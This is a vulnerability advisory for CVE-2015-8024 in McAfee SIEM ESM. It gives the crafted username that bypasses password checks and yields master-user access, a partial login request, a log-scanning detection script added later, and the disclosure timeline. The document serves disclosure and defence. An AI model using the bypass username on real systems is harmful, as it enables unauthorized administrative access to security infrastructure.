McAfee SIEM ESM, ESMREC, and ESMLM Authentication Bypass vulnerability


Quantum Leap Advisory: McAfee SIEM ESM, ESMREC, and ESMLM Authentication Bypass vulnerability
Affected Product: SIEM ESM 9.5.0MR7, 9.4.2MR8, 9.3.2MR18 and earlier releases.
Credits: Vulnerability discovered by Claudio Cinquino of Quantum Leap S.R.L.
CVE: CVE-2015-8024

Executive Summary

Authentication Bypass: A specially crafted username can bypass SIEM ESM authentication (password is not validated) if the ESM is configured to use Active Directory or LDAP authentication sources. This can result in the attacker gaining NGCP (master user) access to the ESM.

Proof of Concept

An authentication bypass vulnerability has been detected in the login form of McAfee SIEM ESM 9.5.x and 9.4.x. To bypass authentication, enter the user NGCP|NGCP|NGCP; and any password in the login form.

POST /ess HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 272

Figure 1 shows an example of the authentication bypass on McAfee SIEM 9.5.0MR7.

Figure 1 – Authentication Bypass Vulnerability McAfee SIEM ESM 9.5.0MR7 PoC


To fix the security issue, we recommend updating to SIEM ESM 9.5.0MR8 or 9.4.2MR9; the vendor has resolved this issue.
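
For reviewing login records while the update is rolled out, the following added example (not part of the original advisory or of McAfee's code) flags logins whose username contains the delimiter characters used in the crafted username above. The log line format, field names and sample lines are constructed assumptions, as is the premise that legitimate account names never contain `|` or `;`.

```python
import re
from urllib.parse import unquote_plus

# Delimiter characters present in the advisory's crafted username.
# Assumption: legitimate AD/LDAP account names here never contain them.
DELIMITERS = frozenset("|;")

# Constructed log format (assumption, not ESM's real log layout):
# "<timestamp> src=<ip> user=<url-encoded username> result=<success|failure>"
FIELD_RE = re.compile(r"(\w+)=(\S+)")

SAMPLE_LOG = [  # constructed sample lines
    "2015-10-10T09:12:01Z src=192.0.2.10 user=jsmith result=success",
    "2015-10-10T09:13:02Z src=192.0.2.77 user=NGCP|NGCP|NGCP; result=failure",
    "2015-10-10T09:13:44Z src=192.0.2.77 user=NGCP%7CNGCP%7CNGCP%3B result=success",
    "2015-10-10T09:15:30Z src=192.0.2.10 user=a.rossi result=failure",
]


def parse_line(line):
    """Return the key=value fields of one log line as a dict."""
    return dict(FIELD_RE.findall(line))


def flag_logins(lines):
    """Return (severity, src, username) for logins with delimiter usernames.

    A *successful* login with such a username is rated "high": on affected
    versions the password is not validated, so success suggests the bypass.
    """
    hits = []
    for line in lines:
        fields = parse_line(line)
        if "user" not in fields:
            continue  # not a login record
        # Form-encoded bodies carry '|' and ';' as %7C and %3B; decode first.
        user = unquote_plus(fields["user"])
        if DELIMITERS & set(user):
            severity = "high" if fields.get("result") == "success" else "review"
            hits.append((severity, fields.get("src", "unknown"), user))
    # Successful logins first so they are triaged before failed attempts.
    return sorted(hits, key=lambda h: h[0] != "high")


if __name__ == "__main__":
    for hit in flag_logins(SAMPLE_LOG):
        print(*hit)
```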

Disclosure Timeline

10/10/2015 – Vulnerability Discovered
13/10/2015 – Initial vendor notification
19/10/2015 – The vendor fixed the vulnerability
26/10/2015 – The vendor published a Security Bulletin
02/12/2015 – CVE Assigned


